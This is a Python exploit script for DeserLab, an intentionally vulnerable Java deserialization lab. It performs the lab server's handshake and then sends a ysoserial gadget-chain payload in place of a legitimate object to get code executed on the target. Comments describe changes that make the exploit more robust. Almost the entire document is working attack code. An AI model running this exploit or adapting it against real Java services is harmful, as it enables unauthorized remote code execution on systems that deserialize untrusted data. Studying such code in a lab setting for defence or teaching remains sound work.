Exploit for the DeserLab vulnerable implementation
#!/usr/bin/env python
"""
DiabloHorn - https://diablohorn.com
References
https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
https://www.youtube.com/watch?v=VviY3O-euVQ
http://wouter.coekaerts.be/2015/annotationinvocationhandler
http://www.baeldung.com/java-dynamic-proxies
https://stackoverflow.com/questions/37068982/how-to-execute-shell-command-with-parameters-in-groovy
https://www.sourceclear.com/registry/security/remote-code-execution-through-object-deserialization/java/sid-1710/technical
"""
import argparse
import binascii
import logging
import socket
import struct
import sys
# INFO hides the per-step logging.debug() dumps of the server's replies; lower to DEBUG when a handshake step fails.
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
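class deser(object):
    """Drive the DeserLab client protocol up to the point where the server
    deserializes a client-supplied object, then deliver a ysoserial payload
    in place of the expected HashRequest.

    Apart from the initial 4-byte stream header, every frame in both
    directions is a Java TC_BLOCKDATA record: 0x77, a one-byte length, then
    the raw bytes.  All wire data is handled as ``bytes`` so this runs
    unchanged on Python 2 and 3 (the original relied on Python 2 ``str`` and
    ``str.encode('hex')``).
    """

    # ObjectOutputStream header: STREAM_MAGIC (0xaced) followed by STREAM_VERSION (5)
    STREAM_HEADER = b'\xac\xed\x00\x05'
    # Type code of a "short" block-data record: one-byte length, at most 255 bytes
    TC_BLOCKDATA = b'\x77'

    def __init__(self, tip, tport):
        """Create the TCP socket for target *tip*:*tport* without connecting."""
        self.targetip = tip
        self.targetport = int(tport)
        self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def connect(self):
        """Open the TCP connection to the target."""
        self.s.connect((self.targetip, self.targetport))

    def close(self):
        """Release the socket; safe to call after the server has dropped us."""
        self.s.close()

    def _recv_exact(self, nbytes):
        """Read exactly *nbytes* from the socket.

        A stream socket may hand back fewer bytes than requested, so the
        original single recv() per field could leave the parser misaligned
        with the protocol.

        Raises:
            EOFError: the server closed the connection before *nbytes* arrived.
        """
        chunks = []
        remaining = nbytes
        while remaining > 0:
            chunk = self.s.recv(remaining)
            if not chunk:
                raise EOFError('server closed connection after %d of %d expected bytes'
                               % (nbytes - remaining, nbytes))
            chunks.append(chunk)
            remaining -= len(chunk)
        return b''.join(chunks)

    def _send_blockdata(self, data):
        """Send *data* wrapped in a short TC_BLOCKDATA record (0x77, len, data).

        Raises:
            ValueError: *data* exceeds the 255 bytes a one-byte length can carry.
        """
        if len(data) > 0xff:
            raise ValueError('TC_BLOCKDATA holds at most 255 bytes, got %d' % len(data))
        self.s.sendall(self.TC_BLOCKDATA + struct.pack('B', len(data)) + data)

    def _recv_blockdata(self):
        """Read one short TC_BLOCKDATA record from the server and return its payload.

        Raises:
            ValueError: the record does not start with 0x77 -- we are out of
                sync with the server, or the target is not speaking this protocol.
            EOFError: the connection closed mid-record (from _recv_exact).
        """
        header = self._recv_exact(2)
        # slice rather than index: header[0] is an int on Python 3, bytes on 2
        if header[0:1] != self.TC_BLOCKDATA:
            raise ValueError('expected TC_BLOCKDATA (0x77), got %s'
                             % binascii.hexlify(header).decode('ascii'))
        datalength = struct.unpack('B', header[1:2])[0]
        return self._recv_exact(datalength)

    def javaserial(self):
        """Exchange Java serialization stream headers with the server.

        Both sides write STREAM_MAGIC + STREAM_VERSION first.  A reply that
        differs is only logged as a warning, but it means the target is
        unlikely to be an ObjectInputStream consumer and the later steps
        will most likely fail.
        """
        self.s.sendall(self.STREAM_HEADER)
        resp = self._recv_exact(4)
        logging.debug("server javaserial resp: %s", binascii.hexlify(resp).decode('ascii'))
        if resp != self.STREAM_HEADER:
            logging.warning("server stream header %s != %s -- target may not be a Java object stream",
                            binascii.hexlify(resp).decode('ascii'),
                            binascii.hexlify(self.STREAM_HEADER).decode('ascii'))

    def protohello(self):
        """Receive the server hello block, then send the 4-byte client hello.

        The hello value is the one the original exploit replays from the
        DeserLab client; its meaning is not interpreted here.
        """
        hello = self._recv_blockdata()
        logging.debug("server proto hello %s", binascii.hexlify(hello).decode('ascii'))
        self._send_blockdata(b'\xf0\x00\xba\xaa')

    def protoversion(self):
        """Receive the server version block, then send the two client version bytes (0x01 0x01)."""
        version = self._recv_blockdata()
        logging.debug("server version %s", binascii.hexlify(version).decode('ascii'))
        self._send_blockdata(b'\x01\x01')

    def clientname(self, name=b'testing'):
        """Send the client-name block.

        The block body is a 2-byte big-endian length followed by the name
        bytes (the layout Java's DataOutput.writeUTF() produces for ASCII),
        which the original hard-coded for "testing" together with a
        hand-maintained record length.  Both lengths are now computed.

        Args:
            name: client name as bytes; text is UTF-8 encoded.  Non-ASCII
                names would need Java's modified UTF-8 and are not handled.
        """
        if not isinstance(name, bytes):
            name = name.encode('utf-8')
        self._send_blockdata(struct.pack('>H', len(name)) + name)

    def exploit(self, payload_file):
        """Send the ysoserial payload where the server expects the HashRequest object.

        The server's ObjectInputStream already consumed our stream header in
        javaserial(), so the header ysoserial writes at the front of its
        output must be dropped.  The original discarded the first 4 bytes
        unconditionally; here the header is checked for, and a file that
        lacks it is sent verbatim (assumed already stripped) with a warning
        rather than silently losing the first 4 bytes of the gadget chain.

        Args:
            payload_file: path to a file holding ysoserial's raw output.

        Raises:
            ValueError: the payload file is empty.
        """
        with open(payload_file, 'rb') as content_file:
            payload = content_file.read()
        if not payload:
            raise ValueError('payload file %s is empty' % payload_file)
        if payload.startswith(self.STREAM_HEADER):
            payload = payload[len(self.STREAM_HEADER):]
        else:
            logging.warning('%s does not start with the Java stream header; sending it as-is',
                            payload_file)
        self.s.sendall(payload)
        # The gadget chain may tear down the server side before it answers;
        # a reset here is not a delivery failure, so it is only logged.
        try:
            resp = self.s.recv(1024)
        except socket.error as exc:
            logging.debug('after exploit: connection error %s', exc)
            return
        logging.debug('after exploit: %r', resp)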
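if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description='Exploit for DeserLab',
        epilog='https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/')
    parser.add_argument('targetip', help='target ip to exploit')
    parser.add_argument('targetport', help='target port to exploit')
    parser.add_argument('payloadfile', help='file with the ysoserial payload')
    # Every per-step protocol dump is logging.debug(); with basicConfig at INFO
    # the original script could never show them, which makes a failed handshake
    # hard to diagnose.  The flag lowers the root logger to DEBUG.
    parser.add_argument('-v', '--verbose', action='store_true',
                        help='log the raw server replies of every handshake step')
    myargs = parser.parse_args()
    if myargs.verbose:
        logging.getLogger().setLevel(logging.DEBUG)
    logging.debug("target %s", myargs.targetip)
    logging.debug("port %s", myargs.targetport)
    mydeser = deser(myargs.targetip, myargs.targetport)
    logging.info("Connecting")
    mydeser.connect()
    # Close our end whatever happens: the run normally ends with the server
    # dropping the connection, and the original never closed the socket.
    try:
        logging.info("java serialization handshake")
        mydeser.javaserial()
        logging.info("protocol specific handshake")
        mydeser.protohello()
        logging.info("protocol specific version handshake")
        mydeser.protoversion()
        logging.info("sending name of connected client")
        mydeser.clientname()
        logging.info("exploiting")
        mydeser.exploit(myargs.payloadfile)
    finally:
        mydeser.s.close()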